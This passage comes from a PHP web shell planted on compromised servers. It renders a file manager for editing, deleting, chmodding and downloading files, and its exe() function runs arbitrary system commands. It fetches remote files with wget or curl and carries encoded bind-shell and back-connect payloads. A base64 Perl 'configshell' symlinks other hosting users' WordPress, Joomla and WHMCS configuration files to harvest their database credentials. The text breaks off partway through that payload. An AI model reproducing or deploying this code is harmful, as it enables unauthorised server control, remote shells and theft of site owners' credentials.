<td style=\"text-align:center;\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>
<td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
<a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
<form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
<input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
<input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
</form></td>
</tr>
";
}
elseif($folder == "..") {
if(!$win && $posix){
$name=@posix_getpwuid(@fileowner($folder));
$group=@posix_getgrgid(@filegroup($folder));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
}
else {
$owner = $user;
}
$buff .= "<tr><td><a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'> $folder</a></td><td>LINK</td>
<td style=\"text-align:center;\">".$owner."</td>
<td><center>".get_perms($parent)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
<td><span id=\"titik2\"><a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
<form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
<input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
<input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
</form>
</td></tr>";
}
else {
if(!$win && $posix){
$name=@posix_getpwuid(@fileowner($folder));
$group=@posix_getgrgid(@filegroup($folder));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
}
else {
$owner = $user;
}
$buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' /> [ $folder ]</b></a>
<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
<input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
</form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
<td><center>
<a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
<input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
<td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">delete</a></td></tr>";
}
}
foreach($fname as $file){
$full = $pwd.$file;
if(!$win && $posix){
$name=@posix_getpwuid(@fileowner($folder));
$group=@posix_getgrgid(@filegroup($folder));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
}
else {
$owner = $user;
}
$buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> $file</b></a>
<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
<input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
</form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
<a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
<input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
<td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
<td><a href=\"?y=$pwd&amp;edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$full\">delete</a> | <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gzip</a>)</td></tr>";
}
$buff .= "</table>";
return $buff;
}
function ukuran($file){
if($size = @filesize($file)){
if($size <= 1024) return $size;
else{
if($size <= 1024*1024) {
$size = @round($size / 1024,2);;
return "$size kb";
}
else {
$size = @round($size / 1024 / 1024,2);
return "$size mb";
}
}
}
else return "???";
}
function exe($cmd){
if(function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
}
elseif(function_exists('exec')) {
@exec($cmd,$results);
$buff = "";
foreach($results as $result){
$buff .= $result;
}
return $buff;
}
elseif(function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
}
elseif(function_exists('shell_exec')){
$buff = @shell_exec($cmd);
return $buff;
}
}
function tulis($file,$text){
$textz = gzinflate(base64_decode($text));
if($filez = @fopen($file,"w"))
{
@fputs($filez,$textz);
@fclose($file);
}
}
function ambil($link,$file) {
if($fp = @fopen($link,"r")){
while(!feof($fp)) {
$cont.= @fread($fp,1024);
}
@fclose($fp);
$fp2 = @fopen($file,"w");
@fwrite($fp2,$cont);
@fclose($fp2);
}
}
function which($pr){
$path = exe("which $pr");
if(!empty($path)) { return trim($path); } else { return trim($pr); }
}
function download($cmd,$url){
$namafile = basename($url);
switch($cmd) {
case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;
case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;
case 'wfread' : ambil($wurl,$namafile);break;
case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
default: break;
}
return $namafile;
}
function get_perms($file)
{
if($mode=@fileperms($file)){
$perms='';
$perms .= ($mode & 00400) ? 'r' : '-';
$perms .= ($mode & 00200) ? 'w' : '-';
$perms .= ($mode & 00100) ? 'x' : '-';
$perms .= ($mode & 00040) ? 'r' : '-';
$perms .= ($mode & 00020) ? 'w' : '-';
$perms .= ($mode & 00010) ? 'x' : '-';
$perms .= ($mode & 00004) ? 'r' : '-';
$perms .= ($mode & 00002) ? 'w' : '-';
$perms .= ($mode & 00001) ? 'x' : '-';
return $perms;
}
else return "??????????";
}
function clearspace($text){
return str_replace(" ","_",$text);
}
// net tools
$port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf
+fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE
P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ
dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL
3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug
Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk
HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W
tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL
ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6
uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1
NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg
tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD
e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0
LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo
vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB
+hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
$back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St
ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j
S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ
ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw
Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
$back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA
BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95
zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75
i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A
RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F
6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
//confshell
$configshell = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCg0KPGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyIgLz4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KPHRpdGxlPlByaXY4IFNDUjwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IHRhaG9tYSwgdmVyZGFuYSwgQXJpYWw7DQogZm9udC1zaXplOiBtZWRpdW07DQogY29sb3I6ICNGRkZGRkY7DQogYmFja2dyb3VuZC1jb2xvcjogIzY2NjY2NjsNCiB0ZXh0LWFsaWduOiBjZW50ZXI7DQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KJzsNCnN1YiBsaWx7DQogICAgKCR1c2VyKSA9IEBfOw0KJG1zciA9IHF4e3B3ZH07DQoka29sYT0kbXNyLiIvIi4kdXNlcjsNCiRrb2xhPX5zL1xuLy9nOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob21lL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYSAtIGhvbWUudHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcy50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9nL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd29yZHByZXNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dlYi93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcyAtIHdlYi50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9TU0kucGhwJywka29sYS4nLSBDIE0gRiAudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vU1NJLnBocCcsJGtvbGEuJy0gQyBNIEYgLSBmb3J1bS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmMvY29uZmlnLnBocCcsJGtvbGEuJy0gTXlCQi50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luYy9jb25maWcucGhwJywka29sYS4nLSBNeUJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nLSBPdGhlci50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2xpYi9jb25maWcucGhwJywka29sYS4nLSBCYWxpdGJhbmcudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWNsaWVudHMudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmlsbGluZy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1iaWxsaW5nLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWJpbGxpbmdzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jcyAtIHdobWNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gd2htIC0gd2htLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLSBWQnVsbGV0aW4gLSBmb3J1bS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vY29uZmlnLnBocCcsJGtvbGEuJwktIFBocEJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jIC0gd2htYy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsJGtvbGEuJwktIHdobWNzMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1tYW5nZXdobWNzLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1teXNob3AudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnQudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnRzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnRzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbW1lcmNlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictb3Njb21tZXJjZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1vc2NvbW1lcmNlcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2hvcHBpbmcvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2FsZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd3AudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd3dvcmRwcmVzcyAtIHdwIC0gYmV0YS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmV0YS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBiZXRhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtcHJlc3MudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLXdvcmRwcmVzcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd29yZHByZXNzL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd29yZHByZXNzLWJldGEudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ld3Mvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC1uZXdzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXcvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbmV3LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9ncy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBibG9ncy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9tZS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBob21lLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcm90YWwvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gcHJvdGFsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zaXRlL3dwLWNvbmZpZy5waHAnLCRrb2xhLictIHdvcmRwcmVzcyAtIHNpdGUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21haW4vd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdGVzdC93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSB0ZXN0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhIC0gam9vbWxhIC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBwcm90YWwudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2pvby9jb